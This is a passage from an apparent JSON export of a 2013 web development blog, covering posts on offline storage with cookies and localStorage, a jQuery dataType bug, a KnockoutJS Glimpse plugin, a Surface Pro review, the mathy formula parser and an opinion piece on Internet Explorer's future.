an object of some description you’ll be serializing it to JSON yourself. This really starts to fall over when you want to be able to query the data. If you’ve got lots of objects you’ll have to get them all back out and do in-memory querying of the data.\nImplementing Cookie storage While it’s an exercise in reinventing the wheel we’ll have a look at how to create a very simple key/value storage API on top of cookies.\nWe’ll be using our FlightMode API and creating a new adapter which internally uses PPK’s cookie API.\nFirst things first, how are we storing our data? Across two types of cookies; one is going to be a cookie to track the IDs of the items in the store and the other will be storing the individual items. The reason for this is that we want to avoid exceeding the limits of what we can store in each cookie and additionally we want to be able to easily look up values based on a key.\nWhen we create a new store we’ll check if there’s a tracker cookie, if not we’ll create one:\nvar CookieAdapter = function (storeName) { this.storeName = storeName; var cookie = readCookie(storeName); if (!cookie) { cookie = []; createCookie(storeName, JSON.stringify(cookie)); } else { cookie = JSON.parse(cookie); } this.cookie = cookie; }; Now before we create an add method we’ll need to be able to create IDs, we could do this a couple of ways, we could use the length of our tracking cookie but instead I’m going to use a GUID, here’s a simple function to generate one:\nfunction guid() { return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function (c) { var r = Math.random() * 16 | 0; var v = c == 'x' ? r : (r & 0x3 | 0x8); return v.toString(16); }); } Ultimately all we will be storing is JSON representations of the objects that we push into our store, here’s how an add method would come together:\nCookieAdapter.prototype.add = function(obj) { var id = guid(); createCookie(id, JSON.stringify(obj)); this.cookie.push(id); createCookie(this.storeName, JSON.stringify(this.cookie)); return id; }; First off we’ll generate a new GUID, then insert the record as a new cookie using that ID as the cookie name.
Finally we’ll update the tracker cookie with the new value.\nYou can find the rest of the implementation in the github repository.\nConclusion\nIn this part we’ve taken a look at the idea of using cookies as a storage model for when our application is offline. We’ve seen that they have the advantage of automatically being sent to our server as they are part of the HTTP header.\nWe’ve also seen that there are some really big warning signs that say using cookies for more than just really simple state is a bad idea; they are all just stored as strings, meaning that any manipulation has to be done in memory after deserializing all the data.\nIf you’re curious to see an implementation of cookies for storage in the wild you can check out Qantas, they use cookies to store information like your recent search options. There’s a usercontext cookie that contains information about where you are, which could be used as the place you’d want to start a flight from.\nAll in all cookies are not really a good option when it comes to storing data for our offline application.\n", "id": "2013-05-23-cookies" }, { "title": "Flight Mode - Introduction", "url": "https://www.aaron-powell.com/posts/2013-05-23-introduction/", "date": "Thu, 23 May 2013 00:00:00 +0000", "tags": [ "offline-storage", "flight-mode" ], "description": "", "content": "So you’ve got an idea to build an amazing new web application, it’s going to make you tens of dollars, hundreds of cents, it’s all web API’ed and SPA. There’s a responsive design so it’s mobile friendly, all the cool stuff. But there’s one last piece of the puzzle you need to sort out, offline data. Your application needs to be able to store data in a way that users can still interact with it, even if it’s at a basic level, when they are offline.\nYou need to handle Flight Mode.\nThroughout this series we’re going to be looking at how to do this, how to do offline data storage in your web application. For convenience the series is going to be broken down across the following posts:\nIntroduction Cookies localStorage and sessionStorage IndexedDB FileSystem APIs Useful libraries for offline storage I’m also going to be showing off basic implementations as we’re going along to give a bit of an insight into the way we can implement using these storage models.\nFor that I’ve created a little library which we’ll be interacting through, called FlightMode.
This then allows you to create adapters which are implementations of an underlying storage layer, here’s the API that we’ll be interacting with:\n(function (global) { 'use strict'; var FlightMode = function (storeName, adapterName) { if (!(this instanceof FlightMode)) { return new FlightMode(storeName, adapterName); } this.storeName = storeName; var adapter = FlightMode.adapters[adapterName] || FlightMode.defaultAdapter; this.adapter = adapter.init(storeName); }; FlightMode.prototype.add = function(obj) { return this.adapter.add(obj); }; FlightMode.prototype.remove = function(id) { return this.adapter.remove(id); }; FlightMode.prototype.get = function(id) { return this.adapter.get(id); }; FlightMode.prototype.getAll = function() { return this.adapter.getAll(); }; FlightMode.prototype.getBy = function(property, value) { return this.adapter.getBy(property, value); }; FlightMode.prototype.destroy = function() { return this.adapter.destroy(); }; FlightMode.adapters = {}; global.FlightMode = FlightMode; })(window); The code is also available on my github.\nSo sit back and let’s have a look at how to do Flight Mode capable web applications.\n", "id": "2013-05-23-introduction" }, { "title": "Flight Mode - local and session storage", "url": "https://www.aaron-powell.com/posts/2013-05-23-local-session-storage/", "date": "Thu, 23 May 2013 00:00:00 +0000", "tags": [ "flight-mode", "offline-storage", "localStorage", "sessionStorage" ], "description": "", "content": "Last time we looked at using cookies to store offline data and we also saw that there are a number of problems with that approach. So let’s move forward, let’s look at what our next option would be when it comes to offline storage in our multi-dollar application.\nToday it’s time for the next level of offline storage, localStorage and sessionStorage, which are sometimes referred to as DOM storage.\nI’m going to talk about both of these options together as they share a lot of similarities.\nThere’s a bit of a misconception around these two APIs, people often refer to them as HTML5 storage but in truth they have been available much longer than that, in fact they can be used in browsers as low as IE8 which is not much of a HTML5 browser, and there are a lot more interesting storage options for “HTML5 browsers” that we’ll look at later.\nBenefits of local/session storage Like cookies localStorage and sessionStorage store key/value pairs of data, but they have a much nicer API to work with than you find when trying to work with cookies; there are explicit methods for getting, setting and removing data.\nI keep referring to these two storage models together as they share a common root API but they are different. sessionStorage is designed for storing data for the life of a browser session (until the window/tab is closed). This can make it ideal if you’ve got data that you want to temporarily store until the user leaves your application. But this obviously makes it a dangerous one to use in our scenario, because if the browser was to crash while the user is offline you’re likely to lose the data.\nlocalStorage on the other hand is a long-term persistent storage, meaning that the data will stay between browser restarts, making it much more ideal for persisting data when we’re offline.\nBut ultimately you need to select the right one for the right scenario so there are valid use cases for both and it’s good to have that option.\nDrawbacks of local/session storage Like cookies these stores are only capable of storing string values.
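To make that concrete, storing anything structured means a JSON round-trip on the way in and on the way out; here’s a minimal sketch (the key name is just an example):
// localStorage only deals in strings, so objects get serialised going in
// and parsed coming back out.
var person = { firstName: 'Aaron', lastName: 'Powell' };
localStorage.setItem('person', JSON.stringify(person));

var restored = JSON.parse(localStorage.getItem('person'));
console.log(restored.firstName); // 'Aaron'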
Being stuck with string values has the obvious drawback of being difficult to work with if we’ve got a complex object that we want to store for our application state.\nThe other main drawback is that there’s no “magic sync to server” like with cookies. The data stored in either of these stores is only available to the client application, if you need to get the data back up to the server then you’ll need to perform your own data sync. Now that does have the benefit of not having extra data added to every HTTP request so it’s both a pro and a con.\nImplementing local/session storage While it’s an exercise in reinventing the wheel we’ll have a look at how to create a very simple key/value storage API on top of both localStorage and sessionStorage.\nWe’ll be using our FlightMode API and creating two new adapters, one for each of the stores.\nAs I mentioned they have a nice API to work with and we get data in/out like so:\nlocalStorage.setItem('foo', 'bar'); var item = localStorage.getItem('foo'); localStorage.removeItem('foo'); But like cookies they can only store string values meaning that we’ll be doing a lot of JSON serialization/deserialization, for example here’s how we would do a get/getAll method:\nStore.prototype.get = function(id) { return JSON.parse(this.storage.getItem(id)); }; Store.prototype.getAll = function() { /* this.store holds the tracked ids */ return this.store.map(this.get.bind(this)); }; And like the cookie implementation we’re tracking the IDs of all known objects, which also adds overhead to our interactions as we need to add/remove items from the tracking object.\nYou can find the rest of the implementation in the github repository.\nConclusion While it might seem that there are quite a number of downsides to localStorage and sessionStorage when compared to cookies for offline storage, they are really much better options as they:\nDon’t pollute the HTTP headers (and thus bloat the request/response size) Are designed for storing medium-sized bits of data Have a cleaner API for getting items in/out, which is better designed than relying on string splitting So if you’re needing to store only really simple data structures across browser sessions then localStorage is a good option, especially if the data you’re working with can be indexed by a single property (which would represent your key). If you’re only really focused on a single-session cache then sessionStorage can be a good option but it has a much narrower use-case and is less than ideal for offline applications.\nIf you’re curious to see an implementation of using localStorage for storing data then check out twitter.com and use your browser’s dev tools to inspect localStorage. If you start writing a tweet and then close the tab the contents of that tweet are stored in an item keyed __draft_tweets__:home (there’s also a __draft_tweets__:profile for doing it on your profile page). And there’s a bunch of other useful data stored in there.
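If you want to poke at this yourself, a couple of lines in your browser’s dev tools console will do it (the draft key will only exist if you’ve actually abandoned a tweet):

// dump everything twitter.com has stashed in localStorage
Object.keys(localStorage).forEach(function (key) {
    console.log(key, localStorage.getItem(key));
});

// or grab the draft tweet entry directly
console.log(localStorage.getItem('__draft_tweets__:home'));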
While this data isn’t synced across instances it’s good for when you use a browser and then come back later.\n", "id": "2013-05-23-local-session-storage" }, { "title": "Firefox, jQuery and the case of the Document response", "url": "https://www.aaron-powell.com/posts/2013-05-07-firefox-jquery-missing-datatype/", "date": "Tue, 07 May 2013 00:00:00 +0000", "tags": [ "jquery" ], "description": "A mystery that resulted in a strange mix of expected responses", "content": "I recently tweeted that I was having this problem:\nAs you can see something’s not right there, Chrome is not getting anything back from my AJAX request (or at least a falsey value) where as Firefox seems to be having a Document object.\nI was stumped.\nWhy are you seeing two different responses from the exact same bit of code?\nSo the response we’re getting back has a 0 content length and that was my first point of call, something must be causing the browsers to behave differently when you’ve not got any content.\nI ended up here and what I found was that when this is called:\ncomplete( status, statusText, responses, responseHeaders ); The response object has different properties depending on the browser, in Chrome (and IE) it has a single text property but in Firefox it has a text and xml property. I think we’ve found our problem boss, we’ve somehow got different objects. But still, why are we ending up with a document object not the text like Chrome?\nWell next we end up through this logic. Here jQuery works out what dataType you’re response is and it gives you the appropriate data.\nNow the astute reader may have noticed I wasn’t setting a dataType in my request which means that jQuery will have to do it’s best guess at what to give me, and that is done through this:\n// Try convertible dataTypes for ( type in responses ) { if ( !dataTypes[ 0 ] || s.converters[ type + " " + dataTypes[0] ] ) { finalDataType = type; break; } if ( !firstDataType ) { firstDataType = type; } } It uses a for in loop of all the properties of the response and settles on the last one if it can’t find anything else. Guess what the last one is… xml!\nWell that makes for an easy solution, once you set a dataType on your jQuery ajax settings you’re all good to go, which leads me to my conclusion:\nIf null is valid from your response make sure you tell jQuery what dataType you want it to be. There’s an example repository available here.\n", "id": "2013-05-07-firefox-jquery-missing-datatype" }, { "title": "Internet Explorer userAgents", "url": "https://www.aaron-powell.com/posts/2013-04-19-ie-useragents/", "date": "Fri, 19 Apr 2013 00:00:00 +0000", "tags": [ "internet-explorer", "web" ], "description": "A new program from the IE team", "content": "A few months ago I was asked if I wanted to join a new program that the Internet Explorer team was starting up called IE userAgents. No isn’t related to the the Internet Explorer userAgent string, or the fact that in the leaked IE11 builds it has had a makeover, instead it’s about evangelism of the web platform and shifting peoples perceptions of IE as a modern browser. It’s also worth noting that Internet Explorer isn’t the only browser that has a program like this, Mozilla does too and I’d expect the other browsers do to.\nSo what do we do? Well ultimately it doesn’t really change anything in my day-to-day live as a web developer, I use IE to varying degrees most days, and since getting a Surface Pro I pretty much exclusively use it. 
What we (we being the userAgents) tend to do is keep an eye on keywords across the various social media touch points like Twitter. If someone’s complaining about a site not working in IE then we will look to reach out to them and help them resolve their problem. A similar thing goes with StackOverflow, you’ll find a number of the userAgents hanging around on there answering the communities questions. More often than not the problems people have with Internet Explorer often come down to misconceptions about how to approach web development, things like using userAgent sniffing instead of feature detection or not realizing the browsers capabilities. These issues can present in all browsers, not just Internet Explorer, and educating people on developing for modern browsers (in particular avoiding userAgent sniffing) will ultimately benefit everyone.\nThere is another side though, and that’s addressing specific Internet Explorer problems. Fellow userAgent Johnathan Sampson has been documenting IE10 specific problems as well as work around for those with the aim to be able to produce a guide on things to watch out for and how best to work around them.\nOver the coming months you’ll probably see us out and about in the community, helping to ensure that web developers are as well informed as they can be when producing applications for the modern web. If you want to get in touch with us you can:\nFind us on the twitter list Ping the @IEDevChat twitter account Use the #IEuserAgents hash tag One final note, please stop sniffing userAgents, I promise that I had a shower this morning ;).\n", "id": "2013-04-19-ie-useragents" }, { "title": "IndexedDB at Web Directions Code 13", "url": "https://www.aaron-powell.com/posts/2013-04-10-wdc13/", "date": "Wed, 10 Apr 2013 00:00:00 +0000", "tags": [ "speaking", "indexeddb" ], "description": "Upcoming speaking on IndexedDB", "content": "I’m going to be speaking at the upcoming Web Directions Code in Melbourne (2nd & 3rd May) on the topic of IndexedDB. I’m pretty stoked to be invited to speak as there’s a lot of heavy weights of the web development community that are going to be around and I’ll finally have a chance to crack out my IndexedDB talk to a larger audience.\nSo do yourself a favor, grab a ticket and come on down!\n", "id": "2013-04-10-wdc13" }, { "title": "KnockoutJS plugin for Glimpse", "url": "https://www.aaron-powell.com/posts/2013-03-25-knockoutjs/", "date": "Mon, 25 Mar 2013 00:00:00 +0000", "tags": [ "knockoutjs", "glimpse" ], "description": "A new release of a KnockoutJS plugin for Glimpse", "content": "When I was recently in Seattle for MVP Summit I was hanging out with Anthony van der Hoorn and Nik Molnar of the Glimpse fame. Anthony, knowing my passion for JavaScript has been bouncing ideas around the client-side code for Glimpse for a while and wanting me to have a crack at building a client-side plugin for them. Well it seemed like the perfect time to get to it and not just because I had both the guys on hand to bug when things went wrong ;).\nHaving decided to write a plugin I next had to work out what the plugin would be for and I settled on KnockoutJS. While I’ll admit that I’ve had a love-hate relationship with Knockout the problem space it’s in is very real and it does solve it very well, but when you have Knockout on a page it can be very difficult to work out where you’re actually using it and what’s actually happening in it.\nTo that end I’ve started a Glimpse KnockoutJS plugin. 
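For a bit of context, the kind of thing the plugin has to understand is a ViewModel full of observables, something along these lines (a trivial example, not code from the plugin itself, and 'profile' is just an illustrative element id):

var viewModel = {
    firstName: ko.observable('Aaron'),
    lastName: ko.observable('Powell'),
    tags: ko.observableArray(['javascript', 'knockout'])
};
// a computed observable derived from the simple ones
viewModel.fullName = ko.computed(function () {
    return viewModel.firstName() + ' ' + viewModel.lastName();
});

ko.applyBindings(viewModel, document.getElementById('profile'));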
It’s still in its early days (and I’d love feedback hint hint) but so far what it aims to do is:\nShow you what ViewModels are on a page and what DOM element(s) they are bound to The idea here is that you can see if a ViewModel is reused across multiple DOM elements Capture new ViewModels being added to the page and show them in the plugin This can be handy if you’re creating ViewModels in popups or from Ajax requests Show you the properties of the ViewModels, and if they are observable properties track their changes This should work for any kind of observable, be it a simple observable, an observable array or a computed observable Like I said this is a very early release, but it’s more I wanted it out there and to get feedback ASAP to work out what to focus on. I’ve only done some basic testing so if you’re using it on large Knockout VM’s I’d like to hear how it goes.\nThe code is all up on GitHub so feel free to send PR’s or raise issues so I can get to work on it!\n", "id": "2013-03-25-knockoutjs" }, { "title": "A week with a Surface Pro", "url": "https://www.aaron-powell.com/posts/2013-03-10-a-week-with-a-surface-pro/", "date": "Sun, 10 Mar 2013 00:00:00 +0000", "tags": [ "random" ], "description": "Obligatory post about my experiences to date with a Surface Pro", "content": "So a little a week ago I got myself a Surface Pro and I decided that I’d share my experience with it thus far (because that’s what you do with a new device right? :P).\nFor the record my current Windows machine is a Sony Vaio Z which is about 2.5 years old and I have an iPad 2, so these were the two devices that my Surface Pro was looking to replace.\nThe screenFirst off let’s talk about the screen, it’s the first thing you’ll see after all, and I must say it’s a very nice screen to work with indeed. The Surface Pro is a 1920 x 1080 resolution on a 10.6" panel so it’s a pretty high pixel density packed in there. Sure it’s no retina display but it’s pretty well up there.\nWhen in Metro-mode things fit nicely, IE looks really good on it and the few apps that I have installed/used (mail, calendar, twitter, facebook, etc) do fit in with the design theme nicely. Most importantly they look sharp under the display.\nDesktop-mode is a little different. By default the Surface Pro has the font size turned up to 150% meaning that many windows look just plain odd, toolbars don’t fit in properly, consoles look weird, etc. One of the first tasks I undertook on Desktop was to flick it down to 125%. This seems to make everything scale to a much better size while still keeping things large enough to be touch friendly.\nThe only big worry people have with a touch-enabled screen is fingerprints. Currently I’m looking at the screen while typing the post out and I can honestly say I don’t notice any. When the screen is off and I’m in direct sunlight I’ll notice them but in that regard I’m not really using my screen anyway.\nInteracting with itWhen I bought the Surface Pro I wanted to get a keyboard. Having had an iPad for 18 months now one thing that annoys me about it is that I don’t have a keyboard with it. Sure I could grab my Bluetooth keyboard or get one of the many cases that have one built in but really they don’t seem to fit the ascetics of the device.\nSo you’ve got two choices for the Surface series, a Touch Cover or a Type Cover. I strongly recommend that before you choose one you do some typing with both and see what you feel most comfortable with. 
When I was getting the device I went to test both keyboards by firing up Word and having a type around. To me the Type Cover just felt a lot nicer to work with, the Touch Cover lacked the tactile sensation that many years on a computer have trained me to want and I found that the low-profile that the keyboard runs meant I missed keys too often as I didn’t judge the spacing.\nThe Type Cover reminds me of my Vaio keyboard, it’s got a good tactile response, a good key size and most importantly a good sound as you press the keys!\nWhat I have found about the keyboard is that it can miss keys; I’m not sure if this is something with my device or not but every now and then I seem to have it miss a few keystrokes that I make, meaning you have to go back over what you’re doing. I’d expect this is some driver-level issue that hopefully will clear up as the device matures but since it’s hard to reproduce I can imagine it’ll be a slow fix.\nOne of the main reasons I wanted a Pro over a RT was the pen support. The Pro comes with a pen and I must say it’s really fantastic to use. So far I haven’t been in enough meetings that I’ve actually had to crack it out but I’ve done some doodling in various apps and it just works as you’d expect it to work. I’ll often find myself using the pen in Desktop mode instead of the trackpad or my finger because of its precision.\nAnd that leads me onto the trackpad in the cover, or more generally, mouse based input. I can probably count the number of times on one hand that I’ve used the trackpad that comes in the cover, simply put I find it redundant (for the record I primarily use the trackpad on my laptop over an external mouse so it’s not an anti-trackpad stance or anything). With the screen as close as it is it’s very easy, and natural, to just reach out and touch it to move around. Even writing this I’ve been touching around the screen to move the cursor back/forth because it’s quicker than the trackpad or arrow keys.\nI’ve been really surprised at how quickly I’ve adapted to having a touch-enabled device in front of me and how quickly I got use to being about to touch the screen to perform my actions. This has gotten to the point where I now expect all my screens to be touch enabled which has made me feel rather silly when I’ve poked the screens on my work machine or when I spent a good 30 seconds poking my Vaio screen and getting angry that the window wasn’t exiting.\nDesktop mode is really the only place that is let down by touch, particularly Visual Studio.\nCodingSince I’m a coder it was natural that Visual Studio was going to wind up on here at some point. So far I haven’t done anything really intensive in the form of development using the Surface Pro, more just opening projects and browsing around the source. But Visual Studio really isn’t designed for touch. 
I’d like to be able to “flick up” and have the source code scroll but alas it’s not to be, instead I find myself fighting with the small scrollbars and often reverting to the pen as it’s much better a finer point interaction.\nAs I said I haven’t done much in the way of coding on the device so I can’t really comment on the overall performance of it, but I think it’s safe to say that I don’t see this as a replacement for a high-end developer laptop, instead I see this as something I can grab out on the train for a quick bit of coding, especially if I’m focusing on something non-Visual Studio based.\nMetro or DesktopI’ve been trying to keep my usage of this device very much in the Metro word, I have my mail setup using the Mail app, calendars are available through Calendar, etc. Generally speaking this is working well for me.\nMail is a bit up-and-down with it’s interactions. I’ve come from an Outlook background and as someone who tries to maintain a “zero inbox” but ultimately found this was something that fell by the wayside with the Mail client. Part of the reason was it is a bit of a hassle to move mail around into folders and part of it is because it seems less valuable to do so, since the entire mailbox isn’t down it’s easier to have one folder to search rather than rummaging around (but this is more of a general mail organization shift than specific to Windows 8 Mail).\nThat said I do have Outlook installed as well and generally speaking I have both running. I like Outlook for its familiar but the UI isn’t really touch optimized so it can be a bit clunky. Mail is nicer for touch but the integration with the GAL is really terrible and I can’t for the life of me work out how to add someone as a contact, even if they emailed me first (again where Outlook is much more useful).\nIE works fantastically in Metro, the new shell is really slick and the interactions are really nicely designed. So far I haven’t even installed another browser, I’ve found no need (maybe once I start doing some more web dev I’ll switch since I’ve got some opinions on the dev tools). The only real frustrating thing is there’s no plugin support so I can’t get my password manager integrated which makes the workflow of hitting somewhere I need to log into a pain.\nFor twitter I’ve been trying a variety of clients. Currently I’m using MetroTwit for Win8, I tried Rowi but I really didn’t like it (no replies in snapped, full screen has a really strange use of space and a few other issues).\nI’ve been trying out a few different RSS readers, found a paid one called Feed Reader that has a trial version that seems pretty good.\nSo mostly I find myself in Metro mode as there’s been very little that I need in common usage to go to desktop. That said if it wasn’t for Snapped mode then it might be a different story. I’ve pretty much always got twitter snapped, ticking away. The screen resolution is more than enough to visible space to have a good browser window/email window/etc and having twitter running there too.\nOverallI’ve been using Win8 on my laptop for over 12 months now and had always enjoyed it but now having a touch-enabled device to use it on I’ve really seen it in a whole new light. The Metro UI makes a lot more sense in a touch environment, the platform integration (sharing, search, etc) is so smooth.\nThe Surface Pro is great device, if you’re looking for something reasonably portable I’d recommend looking at it. 
It’s a little bit on the heavy side for me to consider it a direct iPad replacement, but compared to even my Vaio Z (which is really light) it’s a much more portable device.\nOne thing’s for sure, my next developer laptop is going to be touch-enabled, I’m finding it surprisingly advantageous.\n", "id": "2013-03-10-a-week-with-a-surface-pro" }, { "title": "Hello mathy", "url": "https://www.aaron-powell.com/posts/2013-01-22-hello-mathy/", "date": "Tue, 22 Jan 2013 00:00:00 +0000", "tags": [ "typescript", "javascript", "web" ], "description": "An introduction to another new library from me, this time it's mathy, a simple formula parser", "content": "In a previous post I laid out some thoughts on TypeScript which came from building a little library in TypeScript called mathy.\nHello mathyA few months ago I came to a realisation… I’ve never written a parser, at least not a language parser. Sure I’ve parsed CSVs, sure I’ve parsed XML, but never a language.\nPart of what I’ve been working on recently has needed a formula parser to deal with chemical formulas, basically we need to be able to take this:\nY = (Q * 0.12 + 100) / (Q * 15) Another member of the team wrote a C# parser for this so I decided in my spare time to implement something similar in JavaScript and hence mathy was born.\nThe usage is something like this:\nvar engine = new mathy.Engine({ name: 'a', derivation: '1 + 2' }); var result = engine.process(); expect(result[0]).to.equal(3); Pretty simple, create a new engine, provide it some parameters and process it. You can also install mathy as a global Node.js module and get a new command that will do math for you:\n>> npm install -g mathy >> mathy "1 + 2" //output's 3 Smarter than your average shellSo that example isn’t particularly useful, open up PowerShell (or Terminal) and you can easily just type 1 + 2 and get a result. Where mathy does get a bit more useful is when you want a more complex formula parsed, something like this:\nvar engine = new mathy.Engine({ name: 'a', derivation: '1 + 2 * 3 - 1 * 10 ^ 1 / 5' }); var result = engine.process(); expect(result[0]).to.equal(5); Here we’re doing a to the power of (using ^), you can also do negative powers like this:\nvar engine = new mathy.Engine({ name: 'a', derivation: '1 + 2 * 3 - 1 * 10 ^ (-1) / 5' }); Yes negative powers need to be parenthesis wrapped, that’s pretty standard notation if you look around at how to handle it.\nSmarter calculationsLet’s think back to the example that I said we’re parsing in our application:\nY = (Q * 0.12 + 100) / (Q * 15) Well Q isn’t exactly a number so that isn’t a mathematical equation yet, but that’s cool, mathy will allow you to provide multiple parameters, like so:\nvar engine = new mathy.Engine( { name: 'a', derivation: '(Q * 0.12 + 100) / (Q * 15)', result: true }, { name: 'Q', derivation: '10' } ); Now when mathy runs it’ll hit the Q in the formula and then attempt to resolve that. 
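To make that substitution concrete, with Q provided as 10 the evaluation works out roughly like this:

// (Q * 0.12 + 100) / (Q * 15) with Q resolved to 10
// => (10 * 0.12 + 100) / (10 * 15)
// => 101.2 / 150
// => 0.67466...
var result = engine.process();
console.log(result[0]); // roughly 0.6747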
It’ll realise that it’s not a numerical value so it’ll then see if it was another parameter, then it’ll find the value of 10 and be able to insert that.\nWhere this is more useful is when you want to late-add a parameter, meaning you can do this:\nvar engine = new mathy.Engine( { name: 'a', derivation: '(Q * 0.12 + 100) / (Q * 15)', result: true } ); engine.add({ name: 'Q', derivation: '10' }); So you can create the engine and then ask the user for the inputs, adding them as they are provided.\nDecisions, decisionsWhile it’s all well and good to be able to process parameterised numerical equations where mathy starts to get into its own is where it diverges and becomes a bit more of a standalone language; the main feature for this is decisions.\nA decision is a binary condition statement, a tuple, and it’s used like so:\nvar engine = new mathy.Engine( { name: 'a', derivation: '1 > 2 ? -1 : 42' } ); The statement on the left will be evaluated as a true/false statement (it only supports JavaScript strict-equal equality, but you only need to use == not ===).\nAnd of course all parts (well, except the operator) can be parameters:\nnew mathy.Engine( { name: 'a', derivation: 'b == c ? d : e', result: true }, { name: 'b', derivation: '42' }, { name: 'c', derivation: 'd' }, { name: 'd', derivation: '42' }, { name: 'e', derivation: '-1' } ); Real-world usageIt’s all well and good to make this simple little language/parser for chemical formulas but is there any other real reason you’d do this?\nMy main thoughts on this would be in a shopping cart scenario. Since you shouldn’t trust the client if you’re doing any kind of calculation of the cart you’ll be wanting to do that server side. But what if you want to have some benefits? Say you have a threshold before they get free shipping, or a discount for certain number of purchases, preferred customer, etc.\nOften times these can be expressed as a simple formula rather a series of statements in code. Values like ‘is this customer a preferred customer’ can be provided as a parameter value to the formula which then does the calculation.\nConclusionSo there we have it, a very simple little JavaScript formula engine called mathy which has some nice little features to do slightly smarter formulas.\nCheck out the tests folder for more complex usage examples.\n", "id": "2013-01-22-hello-mathy" }, { "title": "Should Internet Explorer be killed?", "url": "https://www.aaron-powell.com/posts/2013-01-17-should-internet-explorer-be-killed/", "date": "Thu, 17 Jan 2013 00:00:00 +0000", "tags": [ "internet-explorer", "opinionated" ], "description": "Is it time for the IE brand to end-of-life?", "content": "Warning - OpinionsIn my last post I explored some of the issues I have with the IE developer tools that basically prevents me from using IE as a primary browser for web development.\nWhile writing that post it got me thinking about how I would go about solving those problems if I was in charge of the project.\nAnd yes, I am an IE MVP but from my perspective an important role of an MVP is to ask the hard questions and not just be another Yes Man, how do I think the IE team will react to this post? Well if I stop blogging and tweeting send help :P.\nDefining IE First off I want to define what I mean when I’m talking about Internet Explorer is the browser “shell” that you see. It’s what you get when you click the blue E. What it is not is Trident or Chakra, which are the rendering engine and JavaScript engine respectively. 
While these are core components that make up IE they are not where I think the problem lies.\nServing two masters So the main problem I see with IE is that it is trying to serve two masters, you have the personal computing user who uses IE. This is your parents, your grandparents, your next door neighbor, the person with a Surface RT. Generally speaking these are the people who are surfing the internet for personal reasons. These people don’t care about legacy stuff, they don’t care that your internal time scheduling application only works in IE6 running quirks mode. They just know that they are wanting to go to a page and it works.\nAnd then you have enterprise. Like it or not IE in the enterprise is really popular for a few reasons. There’s the obvious “it never got updated” reason which is why IE6 inside of big companies is still popular. But more than that IE from a sys admin point of view can be really stripped down. You can change some crazy things in the registry to restrict users (like disabling the developer tools). A lot of sys admins like this as it helps create a controlled environment, a “more secure” environment cough cough.\nThe web developer Then there’s the web developer. They are people like you and me who want to build applications that make use of the latest technologies, web sockets, webgl, offline, CSS3 animations, etc. We don’t give a damn about legacy browsers, that’s not be our target market, we just want browsers to be pushing forward and implementing these emerging standards rather than waiting until they are approved by W3C which can take a very long time.\nIE est mort, vive IE! Now to the crux of this post, the death of Internet Explorer. As I see it you have two real audiences of IE, the people who want it to just work and the people who want it controlled. These are two very distinct groups and the latter impacts the former.\nThe biggest problem that IE faces when trying to go to a faster release cycle is stability. What a lot of people don’t realise about IE is just how embedded in the OS the parts (Trident in particular) are. Trident, or MSHTML.dll, is really heavily used within Windows itself to do different things. Take the help system, it actually runs a web control which displays the content. This web control is powered by Trident. It’s also why you can’t have multiple IE versions installed at the same time, the assemblies would clash.\nAnd then you have Windows 8 which we see an even greater level of embedding of Trident and Chakra than before so they can power the HTML/JavaScript Windows 8 applications. While this isn’t running IE it’s running the same MSHTML.dll and other components.\nSo adopting a Chrome “release every other day” model would be a really risky venture, you need to be making sure that the releases don’t suddenly break anything (remember SharedView? It stopped working when you installed IE9…).\nAt the same time tying IE feature releases to major versions in the way it’s been done recently it equally risky. Sure IE has improved its release schedule over the past few years, but there was still ~18 months between RTM of IE9 and RTM of IE10 (and that was only IE10 for Windows 8, Windows 7 is still in preview). Even though there are preview releases in this time, calling something a preview actively discourages its use day-to-day (and often the preview release was lacking important features). Also think about how the web changed over that time period, WebSQL was the offline storage proposed. 
It was then scrapped for IndexedDB (which itself changed in spec several times causing breaks, imagine if an RTM had been released not a preview then). CSS animations went through a good amount of change with what arguments could get passed to the different transforms. This like this can be hard to react with a slow release cycle.\nThen there’s the backwards compatibility story. I think it’s quite amusing that there’s ways you can force IE to run as a specific version or that removing conditional comments had people really upset. Radical changes just aren’t possible in a brand with as much history as IE has.\nAnd finally, while they say that any press is good press IE has copped a lot of negative press in recent years. Even Microsoft is actively trying to embrace the hate they receive, most notably through this video. But all of this is too late in my opinion, the damage is done.\nAnd this is why I think IE can’t survive.\nFrom the ashes As I’ve said I think Trident and Chakra are great engines, and from this we could get a new direction. Essentially what I want to see is a fork of the IE project, an entirely new browser using the same underlying rendering and JavaScript engine, it’s just in a new outfit. Let’s call this mythical browser John (bah, naming things is hard and we can’t go with Bob again can we…).\nSo you go and install John, it installs into Program Files just like any other stand-alone piece of software and has everything it needs kept in there. John has a new UI shell so we can start revisiting things which really need an overhaul, but most importantly John can be updated without it impacting the core components of Windows which rely on HTML/JavaScript engines, particularly on Windows 8. John is a new take on how you would build a browser using the lessons learn in the last 12 years so it can be more agile and it can have new experimental features added behind flags.\nSo that’s it, no more IE? Completely end of life-ing a product that has such a long rich heritage that IE has is not exactly a realistic proposal. Instead I think that IE would live on in the manner which it is currently doing. IE maintains its current release cycle, 12 - 18 months between “major versions” which sees the addition of new features and the removal of old ones. But instead of being the driver of Microsoft’s web platform it becomes a consumer, a consumer of features introduced into John that are then accepted as stable, are tested for impacts to the whole Windows ecosystem, have registry settings to disable them, and so forth.\nThis means people are able to keep with a brand they have known for over a decade, it’s predictable to them and it just works but at the same time Microsoft is freed from the limitations of having a 12+ year legacy behind them with the pros and cons that brings to the table.\nThe fractured web Chances are you’re reading this and thinking “doesn’t this just fracture the browser market even more?”. The answer is “to a point yes”, but realistically it’s not that much different to the fracturing that we already have. The two main browser vendors besides Microsoft both have “bleeding edge” versions, Firefox has Aurora and Chrome has Canary and essentially what I’m proposing is a Microsoft version of that, just under a new brand name.\nAs we’re losing OldIE from the supported stack of our browsers we’re finding the idea of a fractured web to be less and less relevant. 
